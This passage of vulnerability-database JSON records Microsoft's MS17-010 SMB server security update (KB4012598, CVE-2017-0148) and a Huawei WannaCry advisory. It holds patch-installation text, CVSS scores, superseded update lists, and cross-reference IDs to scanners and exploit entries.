"PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33895"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["700099.PRM", "700059.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952"]}, 
{"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-07T16:58:39", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2021-09-07T16:58:39", "rev": 2}}, "objectVersion": "1.6", "kb": "KB4012598", "msrc": "", "mscve": "CVE-2017-0148", "msplatform": "", "msfamily": "ESU", "msimpact": "Remote Code Execution", "msseverity": "Critical", "superseeds": ["KB982214", "KB917159", "KB957095", "KB923414", "KB971468", "KB3073921", "KB3130896", "KB958687", "KB2536275", "KB3177186", "KB2508429"], "parentseeds": ["KB4486465", "KB4550951", "KB4487019", "KB4530695", "KB4489880", "KB5000844", "KB4503273", "KB4541506", "KB4561670", "KB4571730", "KB4586807", "KB5003661", "KB4018466", "KB4516026", "KB4493471", "KB4499149", "KB5003210", "KB4598288", "KB4512476", "KB4056759", "KB4520002", "KB4487023", "KB4537810", "KB4565536", "KB4507452", "KB4592498", "KB5004955", "KB5004305", "KB4601360", "KB4580378", "KB5005090", "KB5001389", "KB4525234", "KB4577064", "KB4489876", "KB4556860", "KB4534303"], "msproducts": ["9318", "9344", "4393", "9312", "9311", "9316", "10287"], "supportAreaPaths": [], "supportAreaPathNodes": [], "primarySupportAreaPath": []}, "lastseen": "2021-09-07T16:58:39", "differentElements": ["parentseeds"], "edition": 9}, {"bulletin": {"id": "KB4012598", "vendorId": null, "hash": "5189dba2423d8256e4a60788b2d8d950", "type": "mskb", "bulletinFamily": "microsoft", "title": "MS17-010: Description of the security update for Windows SMB Server: March 14, 2017", "description": "None\n\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Windows. 
The most\nsevere of the vulnerabilities could allow remote code execution if an attacker\nsends specially crafted messages to a Microsoft Server Message Block 1.0\n(SMBv1) server. \n \nTo learn more about the vulnerability, see [Microsoft Security Bulletin\nMS17-010](https://technet.microsoft.com/library/security/ms17-010).\n\n## More Information\n\nImportant \n \n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](https://technet.microsoft.com/en-us/library/hh825699).\n\n## How to obtain and install the update\n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic\nupdating, this update will be downloaded and installed automatically. For more\ninformation about how to turn on automatic updating, see [Get security updates\nautomatically](https://www.microsoft.com/en-us/safety/pc-\nsecurity/updates.aspx). \n \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update\nCatalog](http://catalog.update.microsoft.com/v7/site/search.aspx?q=4012598)\nwebsite. 
\n\n## More Information\n\n##\n\n __\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update:\nFAQ](http://support.microsoft.com/ph/6527) \n \nSecurity solutions for IT professionals: [TechNet Security Support and\nTroubleshooting](https://technet.microsoft.com/security/bb980617.aspx) \n \nHelp for protecting your Windows-based computer from viruses and malware:\n[Microsoft Secure](http://support.microsoft.com/contactus/cu_sc_virsec_master) \n \nLocal support according to your country: [International\nSupport](https://www.microsoft.com/en-us/locale.aspx) \n\nFile Information\n\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://support.microsoft.com/en-us/help/4012598", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-15T18:18:24", "history": [], "viewCount": 85, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, 
{"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": 
"2021-09-15T18:18:24", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2021-09-15T18:18:24", "rev": 2}}, "objectVersion": "1.6", "kb": "KB4012598", "msrc": "", "mscve": "CVE-2017-0148", "msplatform": "", "msfamily": "ESU", "msimpact": "Remote Code Execution", "msseverity": "Critical", "superseeds": ["KB958687", "KB2536275", "KB957095", "KB923414", "KB3177186", "KB3073921", "KB917159", "KB2508429", "KB3130896", "KB982214", "KB971468"], "parentseeds": ["KB4601360", "KB4577064", "KB5000844", "KB5001389", "KB4520002", "KB4507452", "KB5005090", "KB4541506", "KB4516026", "KB5004955", "KB5003210", "KB5005606", "KB5003661", "KB4525234", "KB4493471", "KB4487023", "KB4489880", "KB4018466", "KB4512476", "KB4537810", "KB4556860", "KB5004305", "KB4503273", "KB4486465", "KB4592498", "KB4530695", "KB4550951", "KB4598288", "KB4561670", "KB4534303", "KB4571730", "KB4580378", "KB4487019", "KB4056759", "KB4565536", "KB4489876", "KB4499149", "KB4586807"], "msproducts": ["9344", "9312", "9311", "10287", "9316", "4393", "9318"], "supportAreaPaths": [], "supportAreaPathNodes": [], "primarySupportAreaPath": []}, "lastseen": "2021-09-15T18:18:24", "differentElements": ["parentseeds"], "edition": 10}, {"bulletin": {"id": "KB4012598", "vendorId": null, "hash": "2a53a48f8a315156d34ae1453584e475", "type": "mskb", "bulletinFamily": "microsoft", "title": "MS17-010: Description of the security update for Windows SMB Server: March 14, 2017", "description": "None\n\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Windows. The most\nsevere of the vulnerabilities could allow remote code execution if an attacker\nsends specially crafted messages to a Microsoft Server Message Block 1.0\n(SMBv1) server. 
\n \nTo learn more about the vulnerability, see [Microsoft Security Bulletin\nMS17-010](https://technet.microsoft.com/library/security/ms17-010).\n\n## More Information\n\nImportant \n \n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](https://technet.microsoft.com/en-us/library/hh825699).\n\n## How to obtain and install the update\n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic\nupdating, this update will be downloaded and installed automatically. For more\ninformation about how to turn on automatic updating, see [Get security updates\nautomatically](https://www.microsoft.com/en-us/safety/pc-\nsecurity/updates.aspx). \n \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update\nCatalog](http://catalog.update.microsoft.com/v7/site/search.aspx?q=4012598)\nwebsite. 
\n\n## More Information\n\n##\n\n __\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update:\nFAQ](http://support.microsoft.com/ph/6527) \n \nSecurity solutions for IT professionals: [TechNet Security Support and\nTroubleshooting](https://technet.microsoft.com/security/bb980617.aspx) \n \nHelp for protecting your Windows-based computer from viruses and malware:\n[Microsoft Secure](http://support.microsoft.com/contactus/cu_sc_virsec_master) \n \nLocal support according to your country: [International\nSupport](https://www.microsoft.com/en-us/locale.aspx) \n\nFile Information\n\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://support.microsoft.com/en-us/help/4012598", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-14T14:15:28", "history": [], "viewCount": 87, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, 
{"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0419"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": 
"ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-10-14T14:15:28", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2021-10-14T14:15:28", "rev": 2}}, "objectVersion": "1.6", "kb": "KB4012598", "msrc": "", "mscve": "CVE-2017-0148", "msplatform": "", "msfamily": "ESU", "msimpact": "Remote Code Execution", "msseverity": "Critical", "superseeds": ["KB3073921", "KB982214", "KB3130896", "KB3177186", "KB2508429", "KB958687", "KB923414", "KB957095", "KB917159", "KB971468", "KB2536275"], "parentseeds": ["KB4056759", "KB4503273", "KB4489876", "KB4556860", "KB4565536", "KB4601360", "KB5001389", "KB4486465", "KB4586807", "KB4580378", "KB4525234", "KB4516026", "KB4499149", "KB4487019", "KB4541506", "KB5003661", "KB4598288", "KB4577064", "KB4571730", "KB4561670", "KB5004955", "KB4487023", "KB4520002", "KB5005090", "KB4530695", "KB5005606", "KB4512476", "KB4550951", "KB4537810", "KB4489880", "KB4534303", "KB5003210", "KB5006736", "KB5004305", "KB4507452", "KB5000844", "KB4493471", "KB4018466", "KB4592498"], "msproducts": ["4393", "9318", "9312", "10287", "9311", "9344", "9316"], "supportAreaPaths": [], "supportAreaPathNodes": [], "primarySupportAreaPath": []}, "lastseen": "2021-10-14T14:15:28", "differentElements": ["parentseeds"], "edition": 11}], "viewCount": 87, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0419"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-11-12T13:08:44", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2021-11-12T13:08:44", "rev": 2}}, "objectVersion": "1.6", "kb": "KB4012598", "msrc": "", "mscve": "CVE-2017-0148", "msplatform": "", "msfamily": "ESU", "msimpact": "Remote Code Execution", "msseverity": "Critical", "superseeds": ["KB958687", "KB923414", "KB917159", "KB3130896", "KB3073921", "KB2536275", "KB3177186", "KB971468", "KB957095", "KB2508429", "KB982214"], "parentseeds": ["KB4530695", "KB5003210", "KB4571730", "KB4537810", 
"KB5004955", "KB4489880", "KB5005090", "KB4598288", "KB4512476", "KB4489876", "KB4507452", "KB4592498", "KB4565536", "KB4486465", "KB4520002", "KB5005606", "KB5004305", "KB4550951", "KB4493471", "KB5006736", "KB4534303", "KB4056759", "KB4556860", "KB5000844", "KB4561670", "KB4499149", "KB4487019", "KB4541506", "KB4516026", "KB4601360", "KB4525234", "KB5007263", "KB4580378", "KB5001389", "KB5003661", "KB4577064", "KB4487023", "KB4503273", "KB4586807", "KB4018466"], "msproducts": ["10287", "9344", "4393", "9318", "9316", "9311", "9312"], "supportAreaPaths": [], "supportAreaPathNodes": [], "primarySupportAreaPath": [], "_object_type": "robots.models.microsoftKB.MicrosoftKBBulletin", "_object_types": ["robots.models.microsoftKB.MicrosoftKBBulletin", "robots.models.base.Bulletin"]}], "huawei": [{"id": "HUAWEI-SA-20170513-01-WINDOWS", "bulletinFamily": "software", "title": "Security Advisory - 'WannaCry ransomware' Vulnerabilities in Microsoft Windows Systems", "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "published": "2017-05-13T00:00:00", "modified": "2017-05-23T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170513-01-windows-en", "reporter": "Huawei Technologies", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "huawei", "lastseen": "2021-06-08T18:44:26", "history": [{"bulletin": {"affectedSoftware": [{"name": "\u25cfCH242", "operator": "eq", 
"version": "\u25cfRH2268 V2"}, {"name": "\u25cfCH220", "operator": "eq", "version": "\u25cfN2000 Appliance"}, {"name": "\u25cfCH222", "operator": "eq", "version": "\u25cfRH1288A V2"}, {"name": "18800F", "operator": "eq", "version": "V100R001"}, {"name": "\u25cfCH242 V3", "operator": "eq", "version": "\u25cfRH2285"}, {"name": "\u25cfES3000", "operator": "eq", "version": ""}, {"name": "\u25cfCH121", "operator": "eq", "version": "\u25cfiNIC"}, {"name": "\u25cfCH140", "operator": "eq", "version": "\u25cfL2800"}, {"name": "\u25cfE6000 Chassis", "operator": "eq", "version": "\u25cfRH2285H V2"}, {"name": "\u25cfBigdata Appliance", "operator": "eq", "version": "\u25cfHuawei solutions for SAP HANA"}, {"name": "OceanStor18500V3", "operator": "eq", "version": "V300R003C10"}, {"name": "\u25cfBH620 V2", "operator": "eq", "version": "\u25cfFusionAccess"}, {"name": "18800V3", "operator": "eq", "version": "V300R003C00"}, {"name": "Product Name", "operator": "eq", "version": "Affected Version"}, {"name": "\u25cfeLog", "operator": "eq", "version": "\u25cfRH2288 V2"}, {"name": "18800V3", "operator": "eq", "version": "V300R003C10"}, {"name": "\u25cfCH221", "operator": "eq", "version": "\u25cfRH1288 V2"}, {"name": "\u25cfBH640 V2", "operator": "eq", "version": "\u25cfHertz-W29"}, {"name": "\u25cfBH622 V2", "operator": "eq", "version": "\u25cfHertz-W19"}, {"name": "OceanStor18500", "operator": "eq", "version": "V100R001"}, {"name": "18800V3", "operator": "eq", "version": "V300R003C20"}, {"name": "OceanStor18500V3", "operator": "eq", "version": "V300R003C00"}, {"name": "\u25cfE6000", "operator": "eq", "version": "\u25cfRH2285 V2"}, {"name": "OceanStor18500V3", "operator": "eq", "version": "V300R003C20"}, {"name": "\u25cfCH240", "operator": "eq", "version": "\u25cfRH2265 V2"}, {"name": "\u25cfBH621 V2", "operator": "eq", "version": "\u25cfHertz-W09"}, {"name": "18800", "operator": "eq", "version": "V100R001"}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", 
"CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-02-01T18:01:51", "references": [{"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"], "type": "threatpost"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", 
"RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", 
